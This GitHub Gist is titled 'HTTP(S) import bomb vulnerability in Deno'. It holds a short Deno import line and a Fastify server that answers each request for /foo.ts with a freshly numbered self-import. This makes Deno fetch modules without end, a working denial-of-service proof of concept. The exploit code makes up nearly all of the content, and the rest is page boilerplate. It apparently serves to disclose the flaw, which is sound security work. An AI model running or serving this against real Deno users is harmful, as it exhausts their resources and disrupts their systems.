Created
February 12, 2021 14:40
-
-
Save jasnell/1025b3a111f21ce65d1c274f0e7935ce to your computer and use it in GitHub Desktop.
HTTP(S) import bomb vulnerability in Deno
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import * as foo from 'http://localhost:3001/foo.ts' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const fastify = require('fastify')({ logger: true }) | |
| let counter = 1; | |
| fastify.get('/foo.ts', (request, reply) => { | |
| reply | |
| .code(200) | |
| .header('Content-Type', 'application/x-typescript') | |
| .send(`import * as foo from 'http://localhost:3001/foo.ts?${counter++}'`); | |
| }) | |
| const start = async () => { | |
| try { | |
| await fastify.listen(3001) | |
| fastify.log.info(`server listening on ${fastify.server.address().port}`) | |
| } catch (err) { | |
| fastify.log.error(err) | |
| process.exit(1) | |
| } | |
| } | |
| start(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment